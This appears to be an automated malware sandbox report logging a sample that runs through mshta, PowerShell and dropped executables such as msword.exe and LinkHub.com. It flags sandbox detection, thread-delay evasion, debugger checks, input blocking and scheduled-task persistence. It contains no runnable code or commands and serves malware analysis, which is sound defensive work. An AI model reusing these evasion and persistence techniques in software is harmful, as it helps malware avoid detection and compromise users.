Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_38-103866

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3820	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2887	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4525	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 958	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5298
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3419

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

API coverage: 3.9 %

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6756	Thread sleep count: 3820 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6756	Thread sleep count: 2887 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5436	Thread sleep time: -12912720851596678s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6632	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6732	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7264	Thread sleep count: 4525 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7356	Thread sleep time: -10145709240540247s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7252	Thread sleep count: 958 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7580	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7660	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3336	Thread sleep count: 5298 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3864	Thread sleep count: 3419 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7236	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7876	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 5696	Thread sleep count: 81 > 30
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com TID: 5308	Thread sleep time: -42500s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 15_2_004062D5 FindFirstFileW,FindClose,	15_2_004062D5
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 15_2_00402E18 FindFirstFileW,	15_2_00402E18
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 15_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	15_2_00406C9B
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00C2A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	38_2_00C2A087
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00C2A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	38_2_00C2A1E2
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00C1E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	38_2_00C1E472
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00C2A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	38_2_00C2A570
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00C266DC FindFirstFileW,FindNextFileW,FindClose,	38_2_00C266DC
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00BEC622 FindFirstFileExW,	38_2_00BEC622
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00C273D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	38_2_00C273D4
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00C27333 FindFirstFileW,FindClose,	38_2_00C27333
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00C1D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	38_2_00C1D921
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00C1DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	38_2_00C1DC54

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00BB5FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

38_2_00BB5FC8

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\msword	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\msword\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: mshta.exe, 00000000.00000002.2017009413.0000000005343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2009182730.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2012744974.00000000007CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2017193218.00000000053DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2012419169.00000000007CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2008561227.0000000005343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2015471342.00000000007CF000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00C2F4FF BlockInput,

38_2_00C2F4FF

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00BB338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

38_2_00BB338B

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Code function: 15_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

15_2_004062FC

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00BD5058 mov eax, dword ptr fs:[00000030h]

38_2_00BD5058

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com

Code function: 38_2_00C120AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,

38_2_00C120AA

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00BE2992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	38_2_00BE2992
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00BD0BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	38_2_00BD0BAF
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	Code function: 38_2_00BD0D45 SetUnhandledExceptionFilter,	38_2_00BD0D45
